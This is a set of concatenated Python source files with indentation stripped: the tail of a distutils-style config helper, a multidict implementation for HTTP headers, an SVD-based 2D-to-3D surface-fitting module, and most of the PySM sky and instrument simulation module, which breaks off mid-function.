global _config_vars
if _config_vars is None:
func = globals().get("_init_" + os.name)
if func:
func()
else:
_config_vars = {}
# Normalized versions of prefix and exec_prefix are handy to have;
# in fact, these are the standard versions used most places in the
# Distutils.
_config_vars['prefix'] = PREFIX
_config_vars['exec_prefix'] = EXEC_PREFIX
if args:
vals = []
for name in args:
vals.append(_config_vars.get(name))
return vals
else:
return _config_vars
def get_config_var(name):
"""Return the value of a single variable using the dictionary
returned by 'get_config_vars()'. Equivalent to
get_config_vars().get(name)
"""
return get_config_vars().get(name)
|
|
"""Multidict implementation.
HTTP Headers and URL query string require specific data structure:
multidict. It behaves mostly like a dict but it can have
several values for the same key.
"""
from collections import abc
import os
import sys
__all__ = ('MultiDictProxy', 'CIMultiDictProxy',
'MultiDict', 'CIMultiDict', 'upstr')
_marker = object()
class _upstr(str):
"""Case insensitive str."""
def __new__(cls, val='',
encoding=sys.getdefaultencoding(), errors='strict'):
if isinstance(val, (bytes, bytearray, memoryview)):
val = str(val, encoding, errors)
elif isinstance(val, str):
pass
else:
val = str(val)
val = val.upper()
return str.__new__(cls, val)
def upper(self):
return self
class _Base:
def getall(self, key, default=_marker):
"""Return a list of all values matching the key."""
res = [v for k, v in self._items if k == key]
if res:
return res
if not res and default is not _marker:
return default
raise KeyError('Key not found: %r' % key)
def getone(self, key, default=_marker):
"""Get first value matching the key."""
for k, v in self._items:
if k == key:
return v
if default is not _marker:
return default
raise KeyError('Key not found: %r' % key)
# Mapping interface #
def __getitem__(self, key):
return self.getone(key, _marker)
def get(self, key, default=None):
"""Get first value matching the key.
The method is alias for .getone().
"""
return self.getone(key, default)
def __iter__(self):
return iter(self.keys())
def __len__(self):
return len(self._items)
def keys(self):
"""Return a new view of the dictionary's keys."""
return _KeysView(self._items)
def items(self):
"""Return a new view of the dictionary's items *(key, value) pairs)."""
return _ItemsView(self._items)
def values(self):
"""Return a new view of the dictionary's values."""
return _ValuesView(self._items)
def __eq__(self, other):
if not isinstance(other, abc.Mapping):
return NotImplemented
if isinstance(other, _Base):
return self._items == other._items
for k, v in self.items():
nv = other.get(k, _marker)
if v != nv:
return False
return True
def __contains__(self, key):
for k, v in self._items:
if k == key:
return True
return False
def __repr__(self):
body = ', '.join("'{}': {!r}".format(k, v) for k, v in self.items())
return '<{} {{{}}}>'.format(self.__class__.__name__, body)
class _CIBase(_Base):
def getall(self, key, default=_marker):
"""Return a list of all values matching the key."""
return super().getall(key.upper(), default)
def getone(self, key, default=_marker):
"""Get first value matching the key."""
return super().getone(key.upper(), default)
def get(self, key, default=None):
"""Get first value matching the key.
The method is alias for .getone().
"""
return super().get(key.upper(), default)
def __getitem__(self, key):
return super().__getitem__(key.upper())
def __contains__(self, key):
return super().__contains__(key.upper())
class _MultiDictProxy(_Base, abc.Mapping):
def __init__(self, arg):
if not isinstance(arg, _MultiDict):
raise TypeError(
'MultiDictProxy requires MultiDict instance, not {}'.format(
type(arg)))
self._items = arg._items
def copy(self):
"""Return a copy of itself."""
return _MultiDict(self.items())
class _CIMultiDictProxy(_CIBase, _MultiDictProxy):
def __init__(self, arg):
if not isinstance(arg, _CIMultiDict):
raise TypeError(
'CIMultiDictProxy requires CIMultiDict instance, not {}'
.format(type(arg)))
self._items = arg._items
def copy(self):
"""Return a copy of itself."""
return _CIMultiDict(self.items())
class _MultiDict(_Base, abc.MutableMapping):
def __init__(self, *args, **kwargs):
self._items = []
self._extend(args, kwargs, self.__class__.__name__, self.add)
def add(self, key, value):
"""Add the key and value, not overwriting any previous value."""
self._items.append((key, value))
def copy(self):
"""Return a copy of itself."""
cls = self.__class__
return cls(self.items())
def extend(self, *args, **kwargs):
"""Extend current MultiDict with more values.
This method must be used instead of update.
"""
self._extend(args, kwargs, 'extend', self.add)
def _extend(self, args, kwargs, name, method):
if len(args) > 1:
raise TypeError("{} takes at most 1 positional argument"
" ({} given)".format(name, len(args)))
if args:
arg = args[0]
if isinstance(args[0], _MultiDictProxy):
items = arg._items
elif isinstance(args[0], _MultiDict):
items = arg._items
elif hasattr(arg, 'items'):
items = arg.items()
else:
for item in arg:
if not len(item) == 2:
raise TypeError(
"{} takes either dict or list of (key, value) "
"tuples".format(name))
items = arg
for key, value in items:
method(key, value)
for key, value in kwargs.items():
method(key, value)
def clear(self):
"""Remove all items from MultiDict."""
self._items.clear()
# Mapping interface #
def __setitem__(self, key, value):
self._replace(key, value)
def __delitem__(self, key):
items = self._items
found = False
for i in range(len(items) - 1, -1, -1):
if items[i][0] == key:
del items[i]
found = True
if not found:
raise KeyError(key)
def setdefault(self, key, default=None):
"""Return value for key, set value to default if key is not present."""
for k, v in self._items:
if k == key:
return v
self._items.append((key, default))
return default
def pop(self, key, default=_marker):
"""Remove specified key and return the corresponding value.
If key is not found, d is returned if given, otherwise
KeyError is raised.
"""
value = None
found = False
for i in range(len(self._items) - 1, -1, -1):
if self._items[i][0] == key:
value = self._items[i][1]
del self._items[i]
found = True
if not found:
if default is _marker:
raise KeyError(key)
else:
return default
else:
return value
def popitem(self):
"""Remove and return an arbitrary (key, value) pair."""
if self._items:
return self._items.pop(0)
else:
raise KeyError("empty multidict")
def update(self, *args, **kwargs):
"""Update the dictionary from *other*, overwriting existing keys."""
self._extend(args, kwargs, 'update', self._replace)
def _replace(self, key, value):
if key in self:
del self[key]
self.add(key, value)
class _CIMultiDict(_CIBase, _MultiDict):
def add(self, key, value):
"""Add the key and value, not overwriting any previous value."""
super().add(key.upper(), value)
def __setitem__(self, key, value):
super().__setitem__(key.upper(), value)
def __delitem__(self, key):
super().__delitem__(key.upper())
def _replace(self, key, value):
super()._replace(key.upper(), value)
def setdefault(self, key, default=None):
"""Return value for key, set value to default if key is not present."""
key = key.upper()
return super().setdefault(key, default)
class _ViewBase:
def __init__(self, items):
self._items = items
def __len__(self):
return len(self._items)
def __repr__(self):
return '{0.__class__.__name__}({0._items!r})'.format(self)
class _ItemsView(_ViewBase, abc.ItemsView):
def __contains__(self, item):
assert isinstance(item, tuple) or isinstance(item, list)
assert len(item) == 2
return item in self._items
def __iter__(self):
yield from self._items
class _ValuesView(_ViewBase, abc.ValuesView):
def __contains__(self, value):
for item in self._items:
if item[1] == value:
return True
return False
def __iter__(self):
for item in self._items:
yield item[1]
class _KeysView(_ViewBase, abc.KeysView):
def __contains__(self, key):
for item in self._items:
if item[0] == key:
return True
return False
def __iter__(self):
for item in self._items:
yield item[0]
if bool(os.environ.get('AIOHTTP_NO_EXTENSIONS')):
MultiDictProxy = _MultiDictProxy
CIMultiDictProxy = _CIMultiDictProxy
MultiDict = _MultiDict
CIMultiDict = _CIMultiDict
upstr = _upstr
else:
try:
from ._multidict import (MultiDictProxy,
CIMultiDictProxy,
MultiDict,
CIMultiDict,
upstr)
except ImportError: # pragma: no cover
MultiDictProxy = _MultiDictProxy
CIMultiDictProxy = _CIMultiDictProxy
MultiDict = _MultiDict
CIMultiDict = _CIMultiDict
upstr = _upstr
|
|
# Author: Jean-Remi King <jeanremi.king@gmail.com>
import numpy as np
from scipy import optimize
from scipy.spatial.distance import squareform, pdist
from sklearn.preprocessing import PolynomialFeatures
class ModelDisplacement(object):
"""Transformer to fit rigid object rotation + translation. It 1) centers
the data, 2) rotates it with SVD, and 3) fits translation to solve:
R * X + t = Y
"""
# Adapted from Nghia Ho <http://nghiaho.com/?page_id=671>
def fit(self, X, Y):
"""
Parameters
==========
X : np.matrix, shape(n_points, 2)
Points 2D locations.
Y : np.matrix, shape(n_points, 3)
Points 3D locations.
Attributes
==========
R_ : np.matrix, shape(3, 3)
Rotation matrix of f(X, Y) solved with SVD.
t_ : np.matrix, shape(1, 3)
Translation vector of f(X, Y) solved after SVD.
inv_R_ : np.matrix, shape(3, 3)
Rotation matrix of f(Y, X) solved with SVD.
t_ : np.matrix, shape(1, 3)
Translation vector of f(Y, X) solved after SVD.
"""
self.R_, self.t_ = self._fit(X, Y)
self.inv_R_, self.inv_t_ = self._fit(Y, X) # XXX should be analytical!
def _fit(self, X, Y):
from numpy import mean, tile, transpose, linalg
X, Y = np.mat(X), np.mat(Y)
n_samples = X.shape[0] # total points
# Center
centroid_X = mean(X, axis=0)
centroid_Y = mean(Y, axis=0)
XX = X - tile(centroid_X, (n_samples, 1))
YY = Y - tile(centroid_Y, (n_samples, 1))
# Fit rotation through SVD
H = transpose(XX) * YY
U, S, Vt = linalg.svd(H)
R_ = Vt.T * U.T
# Special reflection case
if linalg.det(R_) < 0:
Vt[2, :] *= -1
R_ = Vt.T * U.T
# Fit translation
t_ = -R_ * centroid_X.T + centroid_Y.T
return R_, t_
def transform(self, X):
"""
Parameters
==========
X : np.matrix, shape(n_points, 2)
All points 2D locations.
Returns
=======
Y: np.array, shape(n_points, 3)
Rotated + translated X
"""
X = np.mat(X)
n_samples = X.shape[0]
y_pred = self.R_ * X.T + np.tile(self.t_, (1, n_samples))
return np.array(y_pred.T)
def inverse_transform(self, X):
X = np.mat(X)
n_samples = X.shape[0]
y_pred = self.inv_R_ * X.T + np.tile(self.inv_t_, (1, n_samples))
return np.array(y_pred.T)
def fit_transform(self, X, Y):
""" Fits R*X + t = Y and return predicted X.
Parameters
==========
X : np.matrix, shape(n_points, 2)
All points 2D locations.
Returns
=======
Y: np.array, shape(n_points, 3)
Rotated + translated X
"""
self.fit(X, Y)
return np.array(self.t_ransform(X))
class ModelSurface(object):
"""Fits a surface for which we know:
- a small set (`idx`) of points 3D locations (`y`)
- all 2D distances of the points (`X`)
by successively using a rotation fit, translation fit, polynomial fit with
a constrain on the points close distances.
Parameters
=========
alpha : float, in [0, 1]
Constrain parameter. If alpha = 1 the polynomial is fully constrained
by the known 2D distances (rigid surface). If 0, the 2D distance is
relaxed (more curvature).
degree : int
Degree of the polynomial fit.
"""
def __init__(self, alpha=.5, degree=2, verbose='debug'):
self.degree = degree
self.alpha = alpha
self.verbose = verbose
def fit(self, X, y, idx):
"""Fit a
Parameters
==========
X : np.matrix, shape(n_points, 2)
All points 2D locations.
Y : np.matrix, shape(n_known, 3)
Subselection of known points 3D locations.
idx : list | np.array, shape(n_known,)
Indices indicating which are the known points.
Attributes
==========
R_ : np.matrix, shape(3, 3)
Rotation matrix solved with SVD.
t_ : np.matrix, shape(1, 3)
Translation vector solved after SVD.
coefs_ : np.matrix, shape(3, n_polynomes)
Polynomial coefficients.
"""
X = self._check_input(X)
y = self._check_input(y)
# Fit Translation and rotation
self._displacer = ModelDisplacement()
self._displacer.fit(X[idx], y)
# It's computationally easier to rotate y, so that we only computes
# the X polynomial once.
y_displaced = self._displacer.inverse_transform(y)
# Compute X polynomial bases
X_poly = PolynomialFeatures(self.degree).fit_transform(X)
n_coefs = X_poly.shape[1]
# Compute distance and neighbors on the 2D grid once
dist_2D = squareform(pdist(X))
# normalize distance constrain by distance, add one to avoid / 0
weights = 1 + dist_2D ** 2
# Let's initialize from a flat grid since it's the most likely
# For this we'll put x=1, y=1, z=1
x0 = np.hstack((np.zeros((3, 1)),
np.identity(3),
np.zeros((3, n_coefs - 4)))).ravel()
# Avoid 0. for numerical issues
x0 += np.random.randn(*x0.shape) / 1000
coefs_ = optimize.fmin_bfgs(self._loss, x0=x0, gtol=.01,
args=(X_poly, y_displaced, idx, dist_2D,
self.alpha, weights))
self.coefs_ = coefs_
@property
def R_(self):
return self._displacer.R_
@property
def t_(self):
return self._displacer.t_
def _check_input(self, X):
"""Transforms 2D to 3D"""
X = np.array(X)
if X.ndim == 1:
X = X[:, None]
if X.shape[1] == 2:
X = np.hstack((X, np.zeros((len(X), 1))))
return X
def predict(self, X):
"""Predicts the 3D location of from the 2D location.
Parameters
==========
X : np.matrix, shape(n_points, 2)
Known 2D locations.
Returns
=======
Y: np.array, shape(n_points, 3)
Predicted 3D locations.
"""
X = self._check_input(X)
# compute polynomial
X_poly = PolynomialFeatures(self.degree).fit_transform(X)
# Combine polynomials
coefs = self.coefs_.reshape([3, -1])
y_pred = np.dot(coefs, X_poly.T).T
# Rotate and translate
return self._displacer.transform(np.array(y_pred))
def _loss(self, coefs, X_poly, y_displaced, idx, dist_2D, alpha, weights):
"""Least Square Regression on polynomial bases constained with
known 2D distances"""
coefs = coefs.reshape([3, -1])
y_pred = np.dot(coefs, X_poly.T).T
# Compute error with known points
y_error = np.linalg.norm(y_pred[idx, :] - y_displaced)
# Compute points distance on polynomial
dist_3D = squareform(pdist(y_pred))
# Compute distance difference weighted by the distance
dist = np.sqrt(np.sum((dist_3D - dist_2D) ** 2 / weights))
if self.verbose == 'debug':
print(y_error, dist)
return (1 - alpha) * y_error + alpha * dist
|
|
"""
.. module:: pysm
:platform: Unix
:synopsis: module containing primary use classes Sky and Instrument.
.. moduleauthor: Ben Thorne <ben.thorne@physics.ox.ac.uk>
"""
from __future__ import absolute_import, print_function
from scipy import interpolate, integrate
import numpy as np
import healpy as hp
import scipy.constants as constants
import os, sys
from .components import Dust, Synchrotron, Freefree, AME, CMB
from .common import read_key, convert_units, bandpass_convert_units, check_lengths, write_map, build_full_map
class Sky(object):
"""Model sky signal of Galactic foregrounds.
This class combines the contribtions to the Galactic microwave
foreground from thermal dust, synchrotron, AME, free-free, and CMB
emissions.
Is it inistialised using a dictionary. The keys must be 'cmb',
'dust', 'synchrotron', 'freefree', 'ame', and the values must be
dictionaries with the configuration of the named component, e.g.:
cmb_config = {
'model' : 'taylens',
'cmb_specs' : np.loadtxt('pysm/template/camb_lenspotentialCls.dat', unpack = True),
'delens' : False,
'delensing_ells' : np.loadtxt('pysm/template/delens_ells.txt'),
'nside' : nside,
'cmb_seed' : 1111
}
dust_config = {
'model' : 'modified_black_body',
'nu_0_I' : 545.,
'nu_0_P' : 353.,
'A_I' : pysm.read_map('pysm/template/dust_t_new.fits', nside, field = 0),
'A_Q' : pysm.read_map('pysm/template/dust_q_new.fits', nside, field = 0),
'A_U' : pysm.read_map('pysm/template/dust_u_new.fits', nside, field = 0),
'spectral_index' : 1.5,
'temp' : pysm.read_map('pysm/template/dust_temp.fits', nside, field = 0)
}
sky_config = {
'cmb' : cmb_config,
'dust': dust_config,
}
"""
def __init__(self, config, mpi_comm=None):
"""Read the configuration dict for Sky
Implement the configuration file for the Sky instance. Then
define the getattributes corresponding to the requested
components.
"""
self.__config = config
self.__components = list(config.keys())
if 'cmb' in self.Components:
self.cmb = component_adder(CMB, self.Config['cmb'])
self.Uses_HD17 = False
if 'dust' in self.Components:
self.dust = component_adder(Dust, self.Config['dust'], mpi_comm=mpi_comm)
# Here we add an exception for the HD_17 model. This model requires that for bandpass
# integration the model be inistialized knowing the bandpass specification, rather than
# just inidividual frequencies. Therefore we need to be able to call the model directly
# during the bandpass evaluation.
if self.Config['dust'][0]['model'] == 'hensley_draine_2017':
self.Uses_HD17 = True
self.HD_17_bpass = initialise_hd_dust_model_bandpass(self.dust, mpi_comm=mpi_comm, **self.Config['dust'][0])
if 'synchrotron' in self.Components:
self.synchrotron = component_adder(Synchrotron, self.Config['synchrotron'])
if 'freefree' in self.Components:
self.freefree = component_adder(Freefree, self.Config['freefree'])
if 'ame' in self.Components:
self.ame = component_adder(AME, self.Config['ame'])
return
@property
def Uses_HD17(self):
return self.__uses_hd17
@Uses_HD17.setter
def Uses_HD17(self, value):
self.__uses_hd17 = value
@property
def Config(self):
try:
return self.__config
except AttributeError:
print("Sky attribute 'Config' not set.")
sys.exit(1)
@property
def Components(self):
try:
return self.__components
except AttributeError:
print("Sky attribute 'Components' not set.")
sys.exit(1)
def signal(self, **kwargs):
"""Returns the sky as a function of frequency.
This returns a function which is the sum of all the requested
sky components at the given frequency: (T, Q, U)(nu)."""
def signal(nu):
sig = 0.
for component in self.Components:
sig += getattr(self, component)(nu, **kwargs)
return sig
return signal
def add_component(self, name, component):
"""Add a already initialized component object to the sky
Parameters
==========
name : str
name of the new component, it cannot include spaces or commas
component : object
object that provides a signal(nu, **kwargs) function that returns the emission in uK_RJ
"""
self.__components.append(name)
setattr(self, name, component.signal)
class Instrument(object):
"""This class contains the attributes and methods required to model
the instrument observing Sky.
Instrument contains methods used to perform bandpass integration over an arbitrary bandpass, smooth with a Gaussian beam, and a white Gaussian noise component.
Instrument is initialised with dictionary, the possible keys are:
- `frequencies` : frequencies at which to evaluate the Sky model -- numpy.ndarray.
- `use_smoothing` : whether or not to use smoothing -- bool.
- `beams` : Gaussian beam FWHMs in arcmin. Only used if use_smoothing is True. Must be the same length as frequencies.
- `add_noise` : whether or not to add noise -- bool
- `sens_I` : sensitivity of intensity in uK_RJamin. Only used if add_noise is True. Must be same length as frequencies -- numpy.ndarray
- `sens_P` : sensitivity of polarisation in uK_RJamin. Only used if add_noise is True. Must be same length as frequencies -- numpy.ndarray
- `nside` : nside at which to evaluate maps -- int.
- `noise_seed` : noise seed -- int.
- `use_bandpass` : whether or not to use bandpass. If this is True `frequencies` is not required -- bool
- `channels` : frequencies and weights of channels to be calculated as a list of tuples [(frequencies_1, weights_1), (frequencies_2, weights_2) ...] -- list of tuples
- `channel_names` : list of names used to label the files to which channel maps are written -- string.
- `output_directory` : directory to which the files will be written -- str.
- `output_prefix` : prefix for all output files -- str.
- `output_units` : output units -- str
The use of Instrument is with the :class:`pysm.pysm.Sky` class. Given an instance of Sky we can use the :meth:`pysm.pysm.Instrument.obseve` to apply instrumental effects:
>>> sky = pysm.Sky(sky_config)
>>> instrument = pysm.Instrument(instrument_config)
>>> instrument.observe(sky)
"""
def __init__(self, config):
"""Specifies the attributes of the Instrument class."""
for k in config.keys():
read_key(self, k, config)
#Get the number of channels of observations.
if self.Use_Bandpass:
N_channels = len(self.Channels)
#Whilst we are here let's normalise the bandpasses.
self.normalise_bandpass()
if not self.Use_Bandpass:
N_channels = len(self.Frequencies)
#If they are not specified, set the sensitivities and beams
#to zero, corresponding to noiseless and perfect-resolution
#observations.
if not self.Use_Smoothing:
self.Beams = np.zeros(N_channels)
if not self.Add_Noise:
self.Sens_I = np.zeros(N_channels)
self.Sens_P = np.zeros(N_channels)
return
@property
def Frequencies(self):
try:
return self.__frequencies
except AttributeError:
print("Instrument attribute 'Frequencies' not set.")
sys.exit(1)
@property
def Channels(self):
try:
return self.__channels
except AttributeError:
print("Instrument attribute 'Channels' not set.")
sys.exit(1)
@Channels.setter
def Channels(self, value):
self.__channels = value
@property
def Beams(self):
try:
return self.__beams
except AttributeError:
print("Instrument attribute 'Beams' not set.")
sys.exit(1)
@Beams.setter
def Beams(self, value):
self.__beams = value
@property
def Sens_I(self):
try:
return self.__sens_I
except AttributeError:
print("Instrument attribute 'Sens_I' not set.")
sys.exit(1)
@Sens_I.setter
def Sens_I(self, value):
self.__sens_I = value
@property
def Sens_P(self):
try:
return self.__sens_P
except AttributeError:
print("Instrument attribute 'Sens_P' not set.")
sys.exit(1)
@Sens_P.setter
def Sens_P(self, value):
self.__sens_P = value
@property
def Nside(self):
try:
return self.__nside
except AttributeError:
print("Instrument attribute 'Nside' not set.")
sys.exit(1)
@property
def Noise_Seed(self):
try:
return self.__noise_seed
except AttributeError:
print("Instrument attribute 'Noise_Seed' not set.")
sys.exit(1)
@property
def Use_Bandpass(self):
try:
return self.__use_bandpass
except AttributeError:
print("Instrument attribute 'Use_Bandpass' not set.")
sys.exit(1)
@property
def Output_Prefix(self):
try:
return self.__output_prefix
except AttributeError:
print("Instrument attribute 'Output_Prefix' not set.")
sys.exit(1)
@property
def Output_Directory(self):
try:
return self.__output_directory
except AttributeError:
print("Instrument attribute 'Output_Directory' not set.")
sys.exit(1)
@property
def Channel_Names(self):
try:
return self.__channel_names
except AttributeError:
print("Instrument attribute 'Channel_Names' not set.")
sys.exit(1)
@property
def Write_Components(self):
try:
return self.__write_components
except AttributeError:
print("Instrument attribute 'Write_Components' not set.")
sys.exit(1)
@property
def Add_Noise(self):
try:
return self.__add_noise
except AttributeError:
print("Instrument attribute 'Add_Noise' not set.")
@property
def Use_Smoothing(self):
try:
return self.__use_smoothing
except AttributeError:
print("Instrument attribute 'Use_Smoothing' not set.")
@property
def Output_Units(self):
try:
return self.__output_units
except AttributeError:
print("Instrument attribute 'Output_Units not set.'")
@property
def pixel_indices(self):
try:
return self.__pixel_indices
except AttributeError:
print("Instrument attribute 'pixel_indices' not set.")
def observe(self, Sky, write_outputs=True):
"""Evaluate and add instrument effects to Sky's signal function.
This method evaluates the Sky class's signal method at the
requested frequencies, or over the requested bandpass. Then
smooths with a Gaussian beam, if requested. Then adds Gaussian
white noise, if requested. Finally writes the maps to file.
:param Sky: instance of the :class:`pysm.pysm.Sky` class.
:type Sky: class
:return: no return, writes to file.
"""
self.print_info()
signal = Sky.signal()
output = self.apply_bandpass(signal, Sky)
output = self.smoother(output)
noise = self.noiser()
output, noise = self.unit_converter(output, noise)
if write_outputs:
self.writer(output, noise)
else:
return output, noise
return
def apply_bandpass(self, signal, Sky):
"""Function to integrate signal over a bandpass. Frequencies must be
evenly spaced, if they are not the function will object. Weights
must be normalisable.
:param signal: signal function to be integrated of bandpass
:type param: function
:return: maps after bandpass integration shape either (N_freqs, 3, Npix) or (N_channels, 3, Npix) -- numpy.ndarray
"""
if not self.Use_Bandpass:
return signal(self.Frequencies)
elif self.Use_Bandpass:
#First need to tell the Sky class that we are using bandpass and if we are using the HD17 model.
bpass_signal = Sky.signal(use_bandpass = Sky.Uses_HD17)
# convert to Jysr in order to integrate over bandpass
signal_Jysr = lambda nu: bpass_signal(nu) * convert_units("uK_RJ", "Jysr", nu)
bpass_integrated = np.array([bandpass(f, w, signal_Jysr) for (f, w) in self.Channels])
# We now add an exception in for the case of the HD_17 model. This requires that the model be initialised
# with the bandpass information in order for the model to be computaitonally efficient. Therefore this is
# evaluated differently from other models. The function HD_17_bandpass() accepts a tuple (freqs, weights)
# and returns the integrated signal in units of Jysr. Note that it was initialised when the Instrument
# class was first instantiated, if use_bandpass = True. Note that the dust signal will still contribute
# to the bpass_integrated sum in the evaluation above, but will be zero.
if Sky.Uses_HD17:
bpass_integrated += np.array(list(map(Sky.HD_17_bpass, self.Channels)))
return bpass_integrated
else:
print("Please set 'Use_Bandpass' for Instrument object.")
sys.exit(1)
def normalise_bandpass(self):
"""Function to normalise input bandpasses such that they integrate to one
over the stated frequency range.
"""
self.Channels = [(freqs, weights / np.trapz(weights, freqs * 1.e9)) for (freqs, weights) in self.Channels]
return
def smoother(self, map_array):
"""Function to smooth an array of N (T, Q, U) maps with N beams in
units of arcmin.
:param map_array:
:type map_array:
"""
if not self.Use_Smoothing:
return map_array
elif self.Use_Smoothing:
if self.pixel_indices is None:
full_map = map_array
else:
full_map = build_full_map(self.pixel_indices, map_array, self.Nside)
smoothed_map_array = np.array([hp.smoothing(m, fwhm = np.pi / 180. * b / 60., verbose = False) for (m, b) in zip(full_map, self.Beams)])
if self.pixel_indices is None:
return smoothed_map_array
else:
assert smoothed_map_array.ndim == 3, \
"Assuming map array is 3 dimensional (n_freqs x n_maps x n_pixels)"
return smoothed_map_array[..., self.pixel_indices]
else:
print("Please set 'Use_Smoothing' in Instrument object.")
sys.exit(1)
def noiser(self):
"""Calculate white noise maps for given sensitivities. Returns signal
+ noise, and noise maps at the given nside in (T, Q, U). Input
sensitivities are expected to be in uK_CMB amin for the rest of
PySM.
:param map_array: array of maps to which we add noise.
:type map_array: numpy.ndarray.
:return: map plus noise, and noise -- numpy.ndarray
"""
try:
npix = len(self.pixel_indices)
except TypeError:
npix = hp.nside2npix(self.Nside)
if not self.Add_Noise:
return np.zeros((len(self.Sens_I), 3, npix))
elif self.Add_Noise:
# solid angle per pixel in amin2
pix_amin2 = 4. * np.pi / float(hp.nside2npix(self.Nside)) * (180. * 60. / np.pi) ** 2
"""sigma_pix_I/P is std of noise per pixel. It is an array of length
equal to the number of input maps."""
sigma_pix_I = np.sqrt(self.Sens_I ** 2 / pix_amin2)
sigma_pix_P = np.sqrt(self.Sens_P ** 2 / pix_amin2)
np.random.seed(seed = self.Noise_Seed)
noise = np.random.randn(len(self.Sens_I), 3, npix)
noise[:, 0, :] *= sigma_pix_I[:, None]
noise[:, 1, :] *= sigma_pix_P[:, None]
noise[:, 2, :] *= sigma_pix_P[:, None]
return noise
else:
print("Please set 'Add_Noise' in Instrument object.")
sys.exit(1)
def unit_converter(self, map_array, noise):
"""Function to handle the conversion of units.
If using delta bandpasses just evaluate the unit conversion
factor normally. If using a bandpass we calculate the
conversion factor following the Planck HFI definitions.
:param map_array: signal + noise map to convert units of.
:type map_array: numpy.ndarray
:param noise: noise map to conver units of.
:type noise: numpy.ndarray
:return: signal + noise map converted to output units, noise map converted to output units -- numpy.ndarray
"""
if not self.Use_Bandpass:
#If using a delta bandpass just evaluate the standard unit conversion at
#the frequencies of interest. All the scaling is done in uK_RJ.
Uc_signal = np.array(convert_units("uK_RJ", self.Output_Units, self.Frequencies))
elif self.Use_Bandpass:
# In the case of a given bandpass we calculate the unit conversion as explained in the documentation
# of bandpass_convert_units.
Uc_signal = np.array([bandpass_convert_units(self.Output_Units, channel) for channel in self.Channels])
if self.Add_Noise:
# If noise requested also multiple the calculated noise.
if not self.Use_Bandpass:
Uc_noise = np.array(convert_units("uK_CMB", self.Output_Units, self.Frequencies))
elif self.Use_Bandpass:
# first convert noise to Jysr then apply the same unit conversion as used for the signal.
Uc_noise = Uc_signal * np.array([1. / bandpass_convert_units("uK_CMB", channel) for channel in self.Channels])
elif not self.Add_Noise:
Uc_noise = np.zeros_like(Uc_signal)
return Uc_signal[:, None, None] * map_array, Uc_noise[:, None, None] * noise
def file_path(self, channel_name = None, f = None, extra_info = ""):
"""Returns file path for pysm outputs.
"""
if not self.Use_Bandpass:
fname = '%s_nu%sGHz_%s_nside%04d.fits'%(self.Output_Prefix, str("%07.2f"%f).replace(".", "p"), extra_info, self.Nside)
elif self.Use_Bandpass:
fname = '%s_bandpass_%s_%s_nside%04d.fits'%(self.Output_Prefix, channel_name, extra_info, self.Nside)
else:
print("Bandpass set incorrectly.")
sys.exit(1)
return os.path.join(self.Output_Directory, fname)
def writer(self, output, noise):
"""Function to write the total and noise maps to file."""
if not self.Use_Bandpass:
if self.Add_Noise:
for f, o, n in zip(self.Frequencies, output, noise):
print(np.std(n, axis = 1))# * np.sqrt(4. * np.pi / float(hp.nside2npix(128)) * (180. * 60. / np.pi) ** 2)
print(np.std(o, axis = 1))
write_map(self.file_path(f = f, extra_info = "noise"), n, nside=self.Nside, pixel_indices=self.pixel_indices)
write_map(self.file_path(f = f, extra_info = "total"), o + n, nside=self.Nside, pixel_indices=self.pixel_indices)
elif not self.Add_Noise:
for f, o in zip(self.Frequencies, output):
write_map(self.file_path(f = f, extra_info = "total"), o, nside=self.Nside, pixel_indices=self.pixel_indices)
elif self.Use_Bandpass:
if self.Add_Noise:
for c, o, n in zip(self.Channel_Names, output, noise):
write_map(self.file_path(channel_name = c, extra_info = "total"), o + n, nside=self.Nside, pixel_indices=self.pixel_indices)
write_map(self.file_path(channel_name = c, extra_info = "noise"), n, nside=self.Nside, pixel_indices=self.pixel_indices)
elif not self.Add_Noise:
for c, o in zip(self.Channel_Names, output):
write_map(self.file_path(channel_name = c, extra_info = "total"), o, nside=self.Nside, pixel_indices=self.pixel_indices)
return
def print_info(self):
"""Function to print information about current Instrument
specifications to screen.
"""
if not self.Use_Bandpass:
if not check_lengths(self.Frequencies, self.Beams, self.Sens_I, self.Sens_P):
print("Check lengths of frequencies, beams, and sensitivities are equal.")
sys.exit(1)
print("nu (GHz) | sigma_I (uK_CMB amin) | sigma_P (uK_CMB amin) | FWHM (arcmin) \n")
for f, s_I, s_P, b in zip(self.Frequencies, self.Sens_I, self.Sens_P, self.Beams):
print("%07.2f | %05.2f | %05.2f | %05.2f "%(f, s_I, s_P, b))
elif self.Use_Bandpass:
print("Channel name | sigma_I (uK_CMB amin) | sigma_P (uK_CMB amin) | FWHM (arcmin) |")
for cn, s_I, s_P, b in zip(self.Channel_Names, self.Sens_I, self.Sens_P, self.Beams):
print("%s | %05.2f | %05.2f | %05.2f "%(cn, s_I, s_P, b))
return
def bandpass(frequencies, weights, signal):
"""Function to integrate signal over a bandpass.
Frequencies must be evenly spaced, if they are not the function
will object. Weights must be able to be normalised to integrate to 1.
"""
# check that the frequencies are evenly spaced.
check_bpass_frequencies(frequencies)
frequency_separation = (frequencies[1] - frequencies[0]) * 1.e9
# normalise the weights and check that they integrate to 1.
weights /= np.sum(weights * frequency_separation)
check_bpass_weights_normalisation(weights, frequency_separation)
# define the integration: integrand = signal(nu) * w(nu) * d(nu)
# signal is already in MJysr.
return sum([signal(nu) * w * frequency_separation for (nu, w) in zip(frequencies, weights)])
def check_bpass_weights_normalisation(weights, spacing):
"""Function that checks the weights of the bandpass were normalised
properly.
"""
try:
np.testing.assert_almost_equal(np.sum(weights * spacing), 1, decimal = 3)
except AssertionError:
print("Bandpass weights can not be normalised.")
sys.exit(1)
return
def check_bpass_frequencies(frequencies):
"""Function checking the separation of frequencies are even."""
frequency_separation = frequencies[1] - frequencies[0]
number_of_frequencies = frequencies.size
frequency_range = frequencies[-1] - frequencies[0]
try:
np.testing.assert_almost_equal(frequency_separation * (number_of_frequencies - 1)/ frequency_range, 1., decimal = 3)
except AssertionError:
print("Bandpass frequencies not evenly spaced.")
sys.exit(1)
for i in range(frequencies.size - 1):
spacing = frequencies[i + 1] - frequencies[i]
try:
np.testing.assert_almost_equal(spacing / frequency_range, frequency_separation / frequency_range, decimal = 3)
except AssertionError:
print("Bandpass frequencies not evenly spaced.")
sys.exit(1)
return
def component_adder(component_class, dictionary_list, **kwargs):
"""This function adds instances of a component class to a Sky
attribute for that component, e.g. Sky.Dust, thereby allowing for
multiple populations of that component to be simulated.
"""
# need this step in order to avoid calling the setup for
# each scaling law every time the signal is evaluated.
# each dictionary is a configuration dict used to
# instantiate the component's class. We then take the
# signal produced by that population.
